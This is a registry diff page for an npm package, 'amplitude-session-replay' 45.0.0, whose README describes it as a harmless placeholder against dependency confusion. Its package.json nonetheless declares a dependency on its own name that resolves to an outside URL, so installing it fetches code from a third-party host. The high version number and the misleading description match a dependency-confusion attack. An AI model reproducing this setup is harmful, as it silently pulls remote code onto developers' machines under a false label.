amplitude-session-replay 45.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +8 -0
  2. package/index.js +3 -0
  3. package/package.json +14 -0
package/README.md ADDED
@@ -0,0 +1,8 @@
1
+ # amplitude-session-replay
2
+
3
+ ## Placeholder package
4
+
5
+ This package is a **placeholder** published to prevent dependency confusion.
6
+ It does not contain usable code.
7
+
8
+ If you intended to use a different package, check your dependencies or installation instructions.
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "amplitude-session-replay",
3
+ "version": "45.0.0",
4
+ "description": "Placeholder package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "",
11
+ "dependencies": {
12
+ "amplitude-session-replay": "https://repo.securityctrl.com/amplitude-session-replay"
13
+ }
14
+ }